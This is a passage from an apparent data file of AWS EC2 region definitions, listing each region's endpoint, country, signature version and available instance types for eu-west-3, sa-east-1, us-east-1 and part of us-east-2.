"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"x1.16xlarge",
"x1.32xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"eu-west-3": {
"api_name": "ec2_eu_west_paris",
"country": "France",
"endpoint": "ec2.eu-west-3.amazonaws.com",
"id": "eu-west-3",
"instance_types": [
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.18xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
],
"signature_version": "4",
},
"sa-east-1": {
"api_name": "ec2_sa_east",
"country": "Brazil",
"endpoint": "ec2.sa-east-1.amazonaws.com",
"id": "sa-east-1",
"instance_types": [
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
],
"signature_version": "2",
},
"us-east-1": {
"api_name": "ec2_us_east",
"country": "USA",
"endpoint": "ec2.us-east-1.amazonaws.com",
"id": "us-east-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"cc2.8xlarge",
"cr1.8xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"d3en.12xlarge",
"d3en.2xlarge",
"d3en.4xlarge",
"d3en.6xlarge",
"d3en.8xlarge",
"d3en.xlarge",
"dl1.24xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5.12xlarge",
"g5.16xlarge",
"g5.24xlarge",
"g5.2xlarge",
"g5.48xlarge",
"g5.4xlarge",
"g5.8xlarge",
"g5.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"h1.16xlarge",
"h1.2xlarge",
"h1.4xlarge",
"h1.8xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"i4i.16xlarge",
"i4i.2xlarge",
"i4i.32xlarge",
"i4i.4xlarge",
"i4i.8xlarge",
"i4i.large",
"i4i.xlarge",
"im4gn.16xlarge",
"im4gn.2xlarge",
"im4gn.4xlarge",
"im4gn.8xlarge",
"im4gn.large",
"im4gn.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"is4gen.2xlarge",
"is4gen.4xlarge",
"is4gen.8xlarge",
"is4gen.large",
"is4gen.medium",
"is4gen.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p3dn.24xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"vt1.24xlarge",
"vt1.3xlarge",
"vt1.6xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2gd.12xlarge",
"x2gd.16xlarge",
"x2gd.2xlarge",
"x2gd.4xlarge",
"x2gd.8xlarge",
"x2gd.large",
"x2gd.medium",
"x2gd.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"x2iezn.12xlarge",
"x2iezn.2xlarge",
"x2iezn.4xlarge",
"x2iezn.6xlarge",
"x2iezn.8xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"us-east-2": {
"api_name": "ec2_us_east_ohio",
"country": "USA",
"endpoint": "ec2.us-east-2.amazonaws.com",
"id": "us-east-2",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"h1.16xlarge",
"h1.2xlarge",
"h1.4xlarge",
"h1.8xlarge",
"hpc6a.48xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"i4i.16xlarge",
"i4i.2xlarge",
"i4i.32xlarge",
"i4i.4xlarge",
"i4i.8xlarge",
"i4i.large",
"i4i.xlarge",
"im4gn.16xlarge",
"im4gn.2xlarge",
"im4gn.4xlarge",
"im4gn.8xlarge",
"im4gn.large",
"im4gn.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"is4gen.2xlarge",
"is4gen.4xlarge",
"is4gen.8xlarge",
"is4gen.large",
"is4gen.medium",
"is4gen.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
